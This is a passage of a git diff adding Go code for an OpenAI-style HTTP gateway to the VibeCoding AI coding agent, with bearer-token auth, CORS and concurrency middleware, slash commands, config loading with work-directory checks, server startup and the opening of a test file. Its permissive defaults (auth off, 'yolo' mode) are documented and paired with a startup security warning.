+			writeError(w, http.StatusUnauthorized, "missing or invalid Authorization header", "authentication_error")
+			return
+		}
+		if _, ok := tokenSet[token]; !ok {
+			writeError(w, http.StatusUnauthorized, "invalid API key", "authentication_error")
+			return
+		}
+		next.ServeHTTP(w, r)
+	})
+}
+
+// CORSMiddleware adds CORS headers when enabled.
+func CORSMiddleware(cfg CORSConfig, next http.Handler) http.Handler {
+	if !cfg.Enabled {
+		return next
+	}
+	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		if origin := allowedCORSOrigin(cfg, r.Header.Get("Origin")); origin != "" {
+			w.Header().Set("Access-Control-Allow-Origin", origin)
+		}
+		w.Header().Set("Access-Control-Allow-Methods", "GET, POST, DELETE, OPTIONS")
+		w.Header().Set("Access-Control-Allow-Headers", "Content-Type, Authorization")
+		if r.Method == http.MethodOptions {
+			w.WriteHeader(http.StatusNoContent)
+			return
+		}
+		next.ServeHTTP(w, r)
+	})
+}
+
+func allowedCORSOrigin(cfg CORSConfig, requestOrigin string) string {
+	if len(cfg.AllowOrigins) == 0 {
+		return "*"
+	}
+	for _, allowed := range cfg.AllowOrigins {
+		if allowed == "*" {
+			return "*"
+		}
+		if requestOrigin != "" && allowed == requestOrigin {
+			return requestOrigin
+		}
+	}
+	if requestOrigin == "" && len(cfg.AllowOrigins) == 1 {
+		return cfg.AllowOrigins[0]
+	}
+	return ""
+}
+
+// ConcurrencyMiddleware limits the number of concurrent in-flight requests.
+// If maxConcurrent <= 0, no limit is applied.
+func ConcurrencyMiddleware(maxConcurrent int, next http.Handler) http.Handler {
+	if maxConcurrent <= 0 {
+		return next
+	}
+	sem := make(chan struct{}, maxConcurrent)
+	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		select {
+		case sem <- struct{}{}:
+			defer func() { <-sem }()
+			next.ServeHTTP(w, r)
+		default:
+			writeError(w, http.StatusTooManyRequests, "server is at capacity, please retry later", "rate_limit_error")
+		}
+	})
+}
+
+func extractBearerToken(r *http.Request) string {
+	auth := r.Header.Get("Authorization")
+	if auth == "" {
+		return ""
+	}
+	const prefix = "Bearer "
+	if !strings.HasPrefix(auth, prefix) {
+		return ""
+	}
+	return strings.TrimSpace(auth[len(prefix):])
+}
diff --git a/internal/gateway/commands.go b/internal/gateway/commands.go
new file mode 100644
index 0000000..6848c36
--- /dev/null
+++ b/internal/gateway/commands.go
@@ -0,0 +1,234 @@
+package gateway
+
+import (
+	"fmt"
+	"strings"
+)
+
+// CommandResult holds the output of a slash command.
+type CommandResult struct {
+	Message string
+	Error   bool
+}
+
+// handleCommand processes a /xxx slash command.
+// Returns nil if the input is not a command (should go to agent).
+func (s *Server) handleCommand(sess *GatewaySession, input string) *CommandResult {
+	trimmed := strings.TrimSpace(input)
+	if !strings.HasPrefix(trimmed, "/") {
+		return nil
+	}
+
+	parts := strings.Fields(trimmed)
+	if len(parts) == 0 {
+		return nil
+	}
+
+	cmd := parts[0]
+	switch cmd {
+	case "/clear":
+		return s.cmdClear(sess)
+	case "/mode":
+		return s.cmdMode(sess, parts)
+	case "/model":
+		return s.cmdModel(parts)
+	case "/models":
+		return s.cmdModels()
+	case "/sessions":
+		return s.cmdSessions(parts)
+	case "/status":
+		return s.cmdStatus(sess)
+	case "/compact":
+		return s.cmdCompact(sess)
+	case "/skill":
+		return s.cmdSkill(parts)
+	case "/skills":
+		return s.cmdSkills()
+	case "/help":
+		return s.cmdHelp()
+	default:
+		return &CommandResult{Message: fmt.Sprintf("Unknown command: %s. Type /help for available commands.", cmd), Error: true}
+	}
+}
+
+func (s *Server) cmdClear(sess *GatewaySession) *CommandResult {
+	if sess == nil {
+		return &CommandResult{Message: "No active session to clear.", Error: true}
+	}
+	// The session manager keeps the JSONL file, but we reset the in-memory state.
+	// The caller will set agent=nil so the next request builds a fresh agent.
+	return &CommandResult{Message: "✅ Conversation cleared"}
+}
+
+func (s *Server) cmdMode(sess *GatewaySession, parts []string) *CommandResult {
+	if len(parts) > 1 {
+		switch parts[1] {
+		case "plan", "agent", "yolo":
+			if sess != nil {
+				sess.Mode = parts[1]
+			}
+			return &CommandResult{Message: fmt.Sprintf("Mode: %s", strings.ToUpper(parts[1]))}
+		default:
+			return &CommandResult{Message: "Invalid mode. Use: plan, agent, yolo", Error: true}
+		}
+	}
+	mode := s.cfg.DefaultMode
+	if sess != nil && sess.Mode != "" {
+		mode = sess.Mode
+	}
+	return &CommandResult{Message: fmt.Sprintf("Current mode: %s", strings.ToUpper(mode))}
+}
+
+func (s *Server) cmdModel(parts []string) *CommandResult {
+	if len(parts) > 1 {
+		modelID := parts[1]
+		newModel := s.provider.GetModel(modelID)
+		if newModel == nil {
+			return &CommandResult{Message: fmt.Sprintf("Model not found: %s. Use /models to list available models.", modelID), Error: true}
+		}
+		s.mu.Lock()
+		s.model = newModel
+		s.mu.Unlock()
+		return &CommandResult{Message: fmt.Sprintf("✅ Model switched to: %s (%s)", newModel.Name, newModel.ID)}
+	}
+	s.mu.RLock()
+	m := s.model
+	s.mu.RUnlock()
+	return &CommandResult{Message: fmt.Sprintf("Current model: %s (%s)", m.Name, m.ID)}
+}
+
+func (s *Server) cmdModels() *CommandResult {
+	models := s.provider.Models()
+	if len(models) == 0 {
+		return &CommandResult{Message: "No models available."}
+	}
+	var sb strings.Builder
+	sb.WriteString("Available models:\n")
+	s.mu.RLock()
+	currentID := s.model.ID
+	s.mu.RUnlock()
+	for _, m := range models {
+		marker := " "
+		if m.ID == currentID {
+			marker = "*"
+		}
+		sb.WriteString(fmt.Sprintf("  [%s] %s (%s)\n", marker, m.Name, m.ID))
+	}
+	return &CommandResult{Message: sb.String()}
+}
+
+func (s *Server) cmdSessions(parts []string) *CommandResult {
+	sub := "ls"
+	if len(parts) > 1 {
+		sub = strings.ToLower(parts[1])
+	}
+	switch sub {
+	case "ls", "list":
+		ids := s.pool.List()
+		if len(ids) == 0 {
+			return &CommandResult{Message: "No active sessions."}
+		}
+		var sb strings.Builder
+		sb.WriteString(fmt.Sprintf("Active sessions (%d):\n", len(ids)))
+		for _, id := range ids {
+			sb.WriteString(fmt.Sprintf("  - %s\n", id))
+		}
+		return &CommandResult{Message: sb.String()}
+	case "clear", "new":
+		return &CommandResult{Message: "✅ Use a new x_session_id to start a fresh session."}
+	case "del", "delete", "rm":
+		if len(parts) < 3 {
+			return &CommandResult{Message: "Usage: /sessions del <id>", Error: true}
+		}
+		id := parts[2]
+		if s.pool.Get(id) == nil {
+			return &CommandResult{Message: fmt.Sprintf("Session not found: %s", id), Error: true}
+		}
+		s.pool.Remove(id)
+		return &CommandResult{Message: fmt.Sprintf("✅ Session %s deleted.", id)}
+	default:
+		return &CommandResult{Message: "Usage: /sessions [ls|clear|del <id>]", Error: true}
+	}
+}
+
+func (s *Server) cmdStatus(sess *GatewaySession) *CommandResult {
+	if sess == nil {
+		return &CommandResult{Message: "No active session.", Error: true}
+	}
+	mode := s.cfg.DefaultMode
+	if sess.Mode != "" {
+		mode = sess.Mode
+	}
+	s.mu.RLock()
+	modelID := s.model.ID
+	s.mu.RUnlock()
+	msgCount := 0
+	if sess.Manager != nil {
+		msgCount = len(sess.Manager.GetMessages())
+	}
+	msg := fmt.Sprintf("Session: %s\nMode: %s\nModel: %s\nMessages: %d\nWorkDir: %s",
+		sess.ID, strings.ToUpper(mode), modelID, msgCount, sess.WorkDir)
+	return &CommandResult{Message: msg}
+}
+
+func (s *Server) cmdCompact(sess *GatewaySession) *CommandResult {
+	if sess == nil {
+		return &CommandResult{Message: "No active session.", Error: true}
+	}
+
+	// Check if there are enough messages to compact
+	if sess.Manager != nil && len(sess.Manager.GetMessages()) < 2 {
+		return &CommandResult{Message: "Nothing to compact: conversation is too short.", Error: true}
+	}
+
+	// Set the force flag so the next agent run triggers compaction
+	sess.ForceCompact = true
+	return &CommandResult{Message: "✅ Context compaction will be triggered on the next request."}
+}
+
+func (s *Server) cmdSkill(parts []string) *CommandResult {
+	if s.skillsMgr == nil {
+		return &CommandResult{Message: "No skills available.", Error: true}
+	}
+	if len(parts) < 2 {
+		return s.cmdSkills()
+	}
+	name := parts[1]
+	skill := s.skillsMgr.Get(name)
+	if skill == nil {
+		return &CommandResult{Message: fmt.Sprintf("Skill not found: %s", name), Error: true}
+	}
+	return &CommandResult{Message: fmt.Sprintf("✅ Skill '%s' activated: %s", name, skill.Description)}
+}
+
+func (s *Server) cmdSkills() *CommandResult {
+	if s.skillsMgr == nil {
+		return &CommandResult{Message: "No skills available."}
+	}
+	skillList := s.skillsMgr.List()
+	if len(skillList) == 0 {
+		return &CommandResult{Message: "No skills found."}
+	}
+	var sb strings.Builder
+	sb.WriteString("Available skills:\n")
+	for _, sk := range skillList {
+		sb.WriteString(fmt.Sprintf("  - %s (%s): %s\n", sk.Name, sk.Source, sk.Description))
+	}
+	return &CommandResult{Message: sb.String()}
+}
+
+func (s *Server) cmdHelp() *CommandResult {
+	help := `Available commands:
+  /clear                  - Clear conversation context
+  /mode [plan|agent|yolo] - Show or switch mode
+  /model [model_id]       - Show or switch model
+  /models                 - List available models
+  /sessions               - List active sessions
+  /sessions del <id>      - Delete a session
+  /compact                - Trigger context compaction
+  /status                 - Show session status
+  /skill <name>           - Activate a skill
+  /skills                 - List available skills
+  /help                   - Show this help`
+	return &CommandResult{Message: help}
+}
diff --git a/internal/gateway/config.go b/internal/gateway/config.go
new file mode 100644
index 0000000..581d492
--- /dev/null
+++ b/internal/gateway/config.go
@@ -0,0 +1,256 @@
+package gateway
+
+import (
+	"encoding/json"
+	"fmt"
+	"os"
+	"path/filepath"
+	"strings"
+
+	"github.com/startvibecoding/vibecoding/internal/config"
+)
+
+// GatewayConfig holds all gateway-specific configuration.
+type GatewayConfig struct {
+	Listen               string               `json:"listen,omitempty"`
+	Auth                 AuthConfig            `json:"auth"`
+	DefaultMode          string                `json:"defaultMode,omitempty"`
+	DefaultThinkingLevel string                `json:"defaultThinkingLevel,omitempty"`
+	EnableSubAgents      bool                  `json:"enableSubAgents,omitempty"`
+	Sandbox              GatewaySandboxConfig  `json:"sandbox"`
+	AllowedWorkDirs      *[]string             `json:"allowedWorkDirs,omitempty"` // nil=no check, []=deny all overrides
+	Session              SessionConfig         `json:"session"`
+	WorkingDir           string                `json:"workingDir,omitempty"`
+	CORS                 CORSConfig            `json:"cors"`
+	Provider             string                `json:"provider,omitempty"`
+	Model                string                `json:"model,omitempty"`
+	ToolVisibility       ToolVisibilityConfig  `json:"toolVisibility"`
+	SystemPromptMode     string                `json:"systemPromptMode,omitempty"` // "append" (default), "ignore"
+	RequestTimeoutSecs   int                   `json:"requestTimeoutSeconds,omitempty"`
+	MaxConcurrentReqs    int                   `json:"maxConcurrentRequests,omitempty"`
+	LogLevel             string                `json:"logLevel,omitempty"`
+}
+
+// AuthConfig controls bearer token authentication.
+type AuthConfig struct {
+	Enabled bool     `json:"enabled"`
+	Tokens  []string `json:"tokens,omitempty"`
+}
+
+// GatewaySandboxConfig controls sandbox for gateway mode.
+type GatewaySandboxConfig struct {
+	Enabled bool   `json:"enabled"`
+	Level   string `json:"level,omitempty"` // "none", "standard", "strict"; empty=auto from mode
+}
+
+// SessionConfig controls session pool behavior.
+type SessionConfig struct {
+	IdleTimeoutSeconds int `json:"idleTimeoutSeconds,omitempty"`
+	MaxSessions        int `json:"maxSessions,omitempty"`
+}
+
+// CORSConfig controls cross-origin resource sharing.
+type CORSConfig struct {
+	Enabled      bool     `json:"enabled"`
+	AllowOrigins []string `json:"allowOrigins,omitempty"`
+}
+
+// ToolVisibilityConfig controls how tool calls are exposed to the client.
+type ToolVisibilityConfig struct {
+	// Mode controls the transport for tool status:
+	//   "content" (default) — tool output mixed into content stream
+	//   "sse_event" — tool output via separate SSE events
+	//   "none" — no tool output
+	Mode string `json:"mode,omitempty"`
+
+	// Detail controls the verbosity of tool output in content mode:
+	//   "collapsed" (default) — one-line summary: 🔧 `read` main.go
+	//                           edit always shows path + diff
+	//   "expanded" — full output with code fences (Ctrl+O style)
+	Detail string `json:"detail,omitempty"`
+}
+
+// DefaultGatewayConfig returns the default gateway configuration.
+func DefaultGatewayConfig() *GatewayConfig {
+	return &GatewayConfig{
+		Listen:               ":8080",
+		Auth:                 AuthConfig{Enabled: false},
+		DefaultMode:          "yolo",
+		DefaultThinkingLevel: "medium",
+		EnableSubAgents:      false,
+		Sandbox:              GatewaySandboxConfig{Enabled: false},
+		Session:              SessionConfig{IdleTimeoutSeconds: 1800},
+		CORS:                 CORSConfig{Enabled: false, AllowOrigins: []string{"*"}},
+		ToolVisibility:       ToolVisibilityConfig{Mode: "content", Detail: "collapsed"},
+		SystemPromptMode:     "append",
+		RequestTimeoutSecs:   1800,
+		LogLevel:             "info",
+	}
+}
+
+// GatewayConfigPath returns the path to the global gateway.json.
+func GatewayConfigPath() string {
+	return filepath.Join(config.ConfigDir(), "gateway.json")
+}
+
+// ProjectGatewayConfigPath returns the path to the project-level gateway.json.
+func ProjectGatewayConfigPath() string {
+	return filepath.Join(".vibe", "gateway.json")
+}
+
+// LoadGatewayConfig loads the gateway configuration, merging global + project.
+// Priority: .vibe/gateway.json > ~/.vibecoding/gateway.json > defaults
+func LoadGatewayConfig() (*GatewayConfig, error) {
+	cfg, err := LoadGatewayConfigFrom(GatewayConfigPath())
+	if err != nil {
+		return nil, err
+	}
+	// Overlay project-level config
+	projectPath := ProjectGatewayConfigPath()
+	if data, err := os.ReadFile(projectPath); err == nil {
+		if err := json.Unmarshal(data, cfg); err != nil {
+			return nil, fmt.Errorf("parse project gateway config %s: %w", projectPath, err)
+		}
+	}
+	normalizeConfig(cfg)
+	return cfg, nil
+}
+
+// LoadGatewayConfigFrom loads gateway configuration from a specific path (no project merge).
+func LoadGatewayConfigFrom(path string) (*GatewayConfig, error) {
+	cfg := DefaultGatewayConfig()
+
+	data, err := os.ReadFile(path)
+	if err != nil {
+		if os.IsNotExist(err) {
+			return cfg, nil // use defaults
+		}
+		return nil, fmt.Errorf("read gateway config: %w", err)
+	}
+
+	if err := json.Unmarshal(data, cfg); err != nil {
+		return nil, fmt.Errorf("parse gateway config: %w", err)
+	}
+
+	normalizeConfig(cfg)
+	return cfg, nil
+}
+
+// normalizeConfig fills in defaults for empty fields.
+func normalizeConfig(cfg *GatewayConfig) {
+	if cfg.Listen == "" {
+		cfg.Listen = ":8080"
+	}
+	if cfg.DefaultMode == "" {
+		cfg.DefaultMode = "yolo"
+	}
+	if cfg.ToolVisibility.Mode == "" {
+		cfg.ToolVisibility.Mode = "content"
+	}
+	if cfg.ToolVisibility.Detail == "" {
+		cfg.ToolVisibility.Detail = "collapsed"
+	}
+	if cfg.SystemPromptMode == "" {
+		cfg.SystemPromptMode = "append"
+	}
+	if cfg.RequestTimeoutSecs <= 0 {
+		cfg.RequestTimeoutSecs = 1800
+	}
+}
+
+// SaveGatewayConfig writes the configuration to the given path.
+func SaveGatewayConfig(path string, cfg *GatewayConfig) error {
+	if err := os.MkdirAll(filepath.Dir(path), 0700); err != nil {
+		return fmt.Errorf("create config directory: %w", err)
+	}
+	data, err := json.MarshalIndent(cfg, "", "  ")
+	if err != nil {
+		return fmt.Errorf("marshal gateway config: %w", err)
+	}
+	return os.WriteFile(path, data, 0600)
+}
+
+// InitGatewayConfig creates the gateway.json template at the default location.
+// Returns the file path. If force is false and the file already exists, returns an error.
+func InitGatewayConfig(force bool) (string, error) {
+	path := GatewayConfigPath()
+	if !force {
+		if _, err := os.Stat(path); err == nil {
+			return path, fmt.Errorf("gateway.json already exists: %s", path)
+		}
+	}
+	cfg := DefaultGatewayConfig()
+	// Add example tokens and allowedWorkDirs for the template
+	cfg.Auth.Tokens = []string{"sk-change-me-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"}
+	home, _ := os.UserHomeDir()
+	if home == "" {
+		home = "/home/user"
+	}
+	exampleDirs := []string{filepath.Join(home, "projects")}
+	cfg.AllowedWorkDirs = &exampleDirs
+	cfg.WorkingDir = filepath.Join(home, "projects")
+
+	if err := SaveGatewayConfig(path, cfg); err != nil {
+		return "", err
+	}
+	return path, nil
+}
+
+// GetListenAddr returns the effective listen address.
+func (c *GatewayConfig) GetListenAddr() string {
+	if c.Listen != "" {
+		return c.Listen
+	}
+	return ":8080"
+}
+
+// GetWorkDir returns the effective working directory.
+func (c *GatewayConfig) GetWorkDir() string {
+	if c.WorkingDir != "" {
+		if strings.HasPrefix(c.WorkingDir, "~") {
+			home, _ := os.UserHomeDir()
+			if home != "" {
+				return filepath.Join(home, c.WorkingDir[1:])
+			}
+		}
+		return c.WorkingDir
+	}
+	cwd, _ := os.Getwd()
+	return cwd
+}
+
+// GetToolDetail returns the effective tool detail level.
+func (c *GatewayConfig) GetToolDetail() string {
+	if c.ToolVisibility.Detail != "" {
+		return c.ToolVisibility.Detail
+	}
+	return "collapsed"
+}
+
+// ValidateWorkDir checks if the given directory is allowed by the allowedWorkDirs whitelist.
+// Returns nil if allowed, an error describing the violation otherwise.
+func (c *GatewayConfig) ValidateWorkDir(dir string) error {
+	// nil AllowedWorkDirs = no restriction
+	if c.AllowedWorkDirs == nil {
+		return nil
+	}
+	allowed := *c.AllowedWorkDirs
+	// empty list = deny all overrides
+	if len(allowed) == 0 {
+		return fmt.Errorf("x_working_dir overrides are disabled")
+	}
+
+	cleanDir := filepath.Clean(dir)
+	for _, a := range allowed {
+		cleanAllowed := filepath.Clean(a)
+		if cleanDir == cleanAllowed {
+			return nil
+		}
+		// Prefix match with path separator boundary
+		prefix := cleanAllowed + string(filepath.Separator)
+		if strings.HasPrefix(cleanDir, prefix) {
+			return nil
+		}
+	}
+	return fmt.Errorf("directory %q is not in allowedWorkDirs", dir)
+}
diff --git a/internal/gateway/gateway.go b/internal/gateway/gateway.go
new file mode 100644
index 0000000..87af722
--- /dev/null
+++ b/internal/gateway/gateway.go
@@ -0,0 +1,307 @@
+package gateway
+
+import (
+	"context"
+	"encoding/json"
+	"fmt"
+	"log"
+	"net/http"
+	"os"
+	"os/signal"
+	"path/filepath"
+	"strings"
+	"sync"
+	"syscall"
+	"time"
+
+	"github.com/startvibecoding/vibecoding/internal/config"
+	"github.com/startvibecoding/vibecoding/internal/contextfiles"
+	"github.com/startvibecoding/vibecoding/internal/provider"
+	providerfactory "github.com/startvibecoding/vibecoding/internal/provider/factory"
+	"github.com/startvibecoding/vibecoding/internal/sandbox"
+	"github.com/startvibecoding/vibecoding/internal/skills"
+)
+
+// RunOptions holds the CLI flags for the gateway command.
+type RunOptions struct {
+	ConfigPath string
+	Port       string
+	Provider   string
+	Model      string
+	WorkDir    string
+	Sandbox    bool
+	MultiAgent bool
+	Verbose    bool
+	Debug      bool
+}
+
+// Server is the gateway HTTP server.
+type Server struct {
+	mu sync.RWMutex
+
+	cfg      *GatewayConfig
+	settings *config.Settings
+	version  string
+
+	provider   provider.Provider
+	model      *provider.Model
+	sandboxMgr *sandbox.Manager
+	skillsMgr  *skills.Manager
+	pool       *SessionPool
+
+	extraContext     string
+	defaultSessionID string // used when x_session_id is empty
+}
+
+// Run starts the gateway server.
+func Run(opts RunOptions, version string) error {
+	config.Verbose = opts.Verbose || opts.Debug
+	if opts.Debug {
+		_ = os.Setenv("VIBECODING_DEBUG", "1")
+	}
+
+	// Load settings.json
+	settings, err := config.LoadSettings()
+	if err != nil {
+		return fmt.Errorf("load settings: %w", err)
+	}
+
+	// Load gateway.json
+	var gCfg *GatewayConfig
+	if opts.ConfigPath != "" {
+		gCfg, err = LoadGatewayConfigFrom(opts.ConfigPath)
+	} else {
+		gCfg, err = LoadGatewayConfig()
+	}
+	if err != nil {
+		return fmt.Errorf("load gateway config: %w", err)
+	}
+
+	// CLI flag overrides
+	if opts.Port != "" {
+		gCfg.Listen = ":" + opts.Port
+	}
+	if opts.MultiAgent {
+		gCfg.EnableSubAgents = true
+	}
+	if opts.Sandbox {
+		gCfg.Sandbox.Enabled = true
+	}
+	if opts.WorkDir != "" {
+		gCfg.WorkingDir = opts.WorkDir
+	}
+
+	// Resolve provider/model
+	providerName := gCfg.Provider
+	if opts.Provider != "" {
+		providerName = opts.Provider
+	}
+	if providerName == "" {
+		providerName = settings.DefaultProvider
+	}
+
+	modelID := gCfg.Model
+	if opts.Model != "" {
+		modelID = opts.Model
+	}
+	if modelID == "" {
+		modelID = settings.DefaultModel
+	}
+
+	p, model, err := providerfactory.Create(settings, providerName, modelID)
+	if err != nil {
+		return fmt.Errorf("create provider: %w", err)
+	}
+
+	// Setup working directory
+	cwd := gCfg.GetWorkDir()
+
+	// Setup sandbox
+	sbMgr := sandbox.NewManager(cwd)
+	sbEnabled := gCfg.Sandbox.Enabled
+	if !sbEnabled {
+		sbMgr.SetLevel(sandbox.LevelNone)
+	} else {
+		level := sandbox.LevelStandard
+		if gCfg.Sandbox.Level != "" {
+			switch gCfg.Sandbox.Level {
+			case "none":
+				level = sandbox.LevelNone
+			case "strict":
+				level = sandbox.LevelStrict
+			default:
+				level = sandbox.LevelStandard
+			}
+		} else {
+			switch gCfg.DefaultMode {
+			case "plan":
+				level = sandbox.LevelStrict
+			case "yolo":
+				level = sandbox.LevelNone
+			}
+		}
+		if err := sbMgr.SetLevel(level); err != nil {
+			fmt.Fprintf(os.Stderr, "Warning: sandbox unavailable: %v\n", err)
+			sbMgr.SetLevel(sandbox.LevelNone)
+		}
+	}
+
+	// Load skills
+	skillsMgr := skills.NewManager(settings.GetGlobalSkillsDir(), filepath.Join(cwd, ".skills"))
+	_ = skillsMgr.Load()
+
+	// Load context files
+	var extraContext string
+	if settings.ContextFiles.Enabled {
+		cfResult := contextfiles.LoadContextFiles(cwd, config.ConfigDir(), settings.ContextFiles.ExtraFiles)
+		if ctx := contextfiles.BuildContextString(cfResult); ctx != "" {
+			extraContext = ctx
+		}
+	}
+	extraContext += skillsMgr.BuildAllSkillsContext()
+
+	// Build session pool
+	idleTimeout := time.Duration(gCfg.Session.IdleTimeoutSeconds) * time.Second
+	pool := NewSessionPool(gCfg.Session.MaxSessions, idleTimeout)
+
+	srv := &Server{
+		cfg:          gCfg,
+		settings:     settings,
+		version:      version,
+		provider:     p,
+		model:        model,
+		sandboxMgr:   sbMgr,
+		skillsMgr:    skillsMgr,
+		pool:         pool,
+		extraContext: extraContext,
+	}
+
+	// Build routes
+	mux := http.NewServeMux()
+	mux.HandleFunc("/v1/chat/completions", srv.handleChatCompletions)
+	mux.HandleFunc("/v1/models", srv.handleModels)
+	mux.HandleFunc("/health", srv.handleHealth)
+
+	// Apply middleware stack (inside-out)
+	var handler http.Handler = mux
+	handler = ConcurrencyMiddleware(gCfg.MaxConcurrentReqs, handler)
+	handler = CORSMiddleware(gCfg.CORS, handler)
+	handler = LoggingMiddleware(handler)
+
+	// Auth middleware wraps everything except /health
+	authMux := http.NewServeMux()
+	authMux.Handle("/health", LoggingMiddleware(http.HandlerFunc(srv.handleHealth)))
+	authMux.Handle("/", AuthMiddleware(gCfg.Auth, handler))
+
+	httpServer := &http.Server{
+		Addr:         gCfg.GetListenAddr(),
+		Handler:      authMux,
+		ReadTimeout:  30 * time.Second,
+		WriteTimeout: time.Duration(gCfg.RequestTimeoutSecs+10) * time.Second,
+		IdleTimeout:  120 * time.Second,
+	}
+
+	// Graceful shutdown
+	errCh := make(chan error, 1)
+	go func() {
+		fmt.Fprintf(os.Stderr, "VibeCoding Gateway v%s starting on %s\n", version, gCfg.GetListenAddr())
+		fmt.Fprintf(os.Stderr, "  Provider: %s | Model: %s | Mode: %s\n", p.Name(), model.ID, gCfg.DefaultMode)
+		fmt.Fprintf(os.Stderr, "  WorkDir: %s\n", cwd)
+		if gCfg.Auth.Enabled {
+			fmt.Fprintf(os.Stderr, "  Auth: enabled (%d tokens)\n", len(gCfg.Auth.Tokens))
+		} else {
+			fmt.Fprintf(os.Stderr, "  Auth: disabled\n")
+		}
+		if warning := gatewaySecurityWarning(gCfg); warning != "" {
+			fmt.Fprintf(os.Stderr, "  WARNING: %s\n", warning)
+		}
+		if gCfg.Sandbox.Enabled {
+			fmt.Fprintf(os.Stderr, "  Sandbox: enabled (level: %s)\n", gCfg.Sandbox.Level)
+		}
+		if gCfg.EnableSubAgents {
+			fmt.Fprintf(os.Stderr, "  Sub-Agents: enabled\n")
+		}
+		fmt.Fprintf(os.Stderr, "  Tool visibility: %s | System prompt: %s\n", gCfg.ToolVisibility.Mode, gCfg.SystemPromptMode)
+		fmt.Fprintf(os.Stderr, "\nReady to serve.\n")
+		errCh <- httpServer.ListenAndServe()
+	}()
+
+	// Wait for interrupt
+	sigCh := make(chan os.Signal, 1)
+	signal.Notify(sigCh, syscall.SIGINT, syscall.SIGTERM)
+
+	select {
+	case err := <-errCh:
+		if err != nil && err != http.ErrServerClosed {
+			return fmt.Errorf("server error: %w", err)
+		}
+	case sig := <-sigCh:
+		fmt.Fprintf(os.Stderr, "\nReceived %s, shutting down...\n", sig)
+		ctx, cancel := context.WithTimeout(context.Background(), 10*time.Second)
+		defer cancel()
+		pool.Stop()
+		if err := httpServer.Shutdown(ctx); err != nil {
+			return fmt.Errorf("shutdown error: %w", err)
+		}
+	}
+
+	return nil
+}
+
+// LoggingMiddleware logs each request.
+func LoggingMiddleware(next http.Handler) http.Handler {
+	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		start := time.Now()
+		lw := &loggingResponseWriter{ResponseWriter: w, statusCode: http.StatusOK}
+		next.ServeHTTP(lw, r)
+		log.Printf("%s %s %d %s", r.Method, r.URL.Path, lw.statusCode, time.Since(start).Round(time.Millisecond))
+	})
+}
+
+type loggingResponseWriter struct {
+	http.ResponseWriter
+	statusCode int
+}
+
+func (lw *loggingResponseWriter) WriteHeader(code int) {
+	lw.statusCode = code
+	lw.ResponseWriter.WriteHeader(code)
+}
+
+// Ensure loggingResponseWriter also satisfies http.Flusher for SSE.
+func (lw *loggingResponseWriter) Flush() {
+	if f, ok := lw.ResponseWriter.(http.Flusher); ok {
+		f.Flush()
+	}
+}
+
+func gatewaySecurityWarning(cfg *GatewayConfig) string {
+	if cfg.Auth.Enabled || cfg.DefaultMode != "yolo" {
+		return ""
+	}
+	listen := cfg.Listen
+	if strings.HasPrefix(listen, ":") ||
+		strings.HasPrefix(listen, "0.0.0.0:") ||
+		strings.HasPrefix(listen, "[::]:") {
+		return "gateway is listening beyond loopback in yolo mode without authentication"
+	}
+	return ""
+}
+
+// --- Helpers ---
+
+func writeJSON(w http.ResponseWriter, status int, v any) {
+	w.Header().Set("Content-Type", "application/json")
+	w.WriteHeader(status)
+	json.NewEncoder(w).Encode(v)
+}
+
+func writeError(w http.ResponseWriter, status int, message, errType string) {
+	resp := ErrorResponse{
+		Error: ErrorDetail{
+			Message: message,
+			Type:    errType,
+		},
+	}
+	writeJSON(w, status, resp)
+}
diff --git a/internal/gateway/gateway_test.go b/internal/gateway/gateway_test.go
new file mode 100644
index 0000000..3d41a61
--- /dev/null
+++ b/internal/gateway/gateway_test.go
@@ -0,0 +1,1792 @@
+package gateway
+
+import (
+	"encoding/json"
+	"fmt"
+	"net/http"
+	"net/http/httptest"
+	"os"
+	"path/filepath"
+	"strings"
+	"testing"
+	"time"
+
+	"github.com/startvibecoding/vibecoding/internal/agent"
+	"github.com/startvibecoding/vibecoding/internal/config"
+	"github.com/startvibecoding/vibecoding/internal/provider"
+	"github.com/startvibecoding/vibecoding/internal/sandbox"
+	"github.com/startvibecoding/vibecoding/internal/session"
+	"github.com/startvibecoding/vibecoding/internal/skills"
+	"github.com/startvibecoding/vibecoding/internal/tools"
+)
+
+// --- Config tests ---
+
+func TestDefaultGatewayConfig(t *testing.T) {
+	cfg := DefaultGatewayConfig()
+	if cfg.Listen != ":8080" {
+		t.Errorf("default listen = %q, want :8080", cfg.Listen)
+	}
+	if cfg.DefaultMode != "yolo" {
+		t.Errorf("default mode = %q, want yolo", cfg.DefaultMode)
+	}
+	if cfg.ToolVisibility.Mode != "content" {
+		t.Errorf("default tool visibility = %q, want content", cfg.ToolVisibility.Mode)
+	}
+	if cfg.SystemPromptMode != "append" {
+		t.Errorf("default system prompt mode = %q, want append", cfg.SystemPromptMode)
+	}
+	if cfg.RequestTimeoutSecs != 1800 {
+		t.Errorf("default timeout = %d, want 1800", cfg.RequestTimeoutSecs)
+	}
+	if cfg.Auth.Enabled {
+		t.Error("auth should be disabled by default")
+	}
+}
+
+func TestLoadGatewayConfig_Missing(t *testing.T) {
+	cfg, err := LoadGatewayConfigFrom("/nonexistent/path/gateway.json")
+	if err != nil {
+		t.Fatalf("unexpected error for missing config: %v", err)
+	}
+	if cfg.Listen != ":8080" {
+		t.Errorf("fallback listen = %q, want :8080", cfg.Listen)
+	}
+}
+
+func TestLoadGatewayConfig_Custom(t *testing.T) {
+	dir := t.TempDir()
+	path := filepath.Join(dir, "gateway.json")
+	data := `{
+		"listen": ":9090",
+		"auth": {"enabled": true, "tokens": ["sk-test"]},
+		"defaultMode": "agent",
+		"toolVisibility": {"mode": "none"},
+		"systemPromptMode": "ignore",
+		"requestTimeoutSeconds": 600,
+		"maxConcurrentRequests": 10,
+		"allowedWorkDirs": ["/home/test"]
+	}`
+	os.WriteFile(path, []byte(data), 0644)
+
+	cfg, err := LoadGatewayConfigFrom(path)
+	if err != nil {
+		t.Fatalf("load error: %v", err)
+	}
+	if cfg.Listen != ":9090" {
+		t.Errorf("listen = %q, want :9090", cfg.Listen)
+	}
+	if !cfg.Auth.Enabled {
+		t.Error("auth should be enabled")
+	}
+	if len(cfg.Auth.Tokens) != 1 || cfg.Auth.Tokens[0] != "sk-test" {
+		t.Errorf("tokens = %v, want [sk-test]", cfg.Auth.Tokens)
+	}
+	if cfg.DefaultMode != "agent" {
+		t.Errorf("mode = %q, want agent", cfg.DefaultMode)
+	}
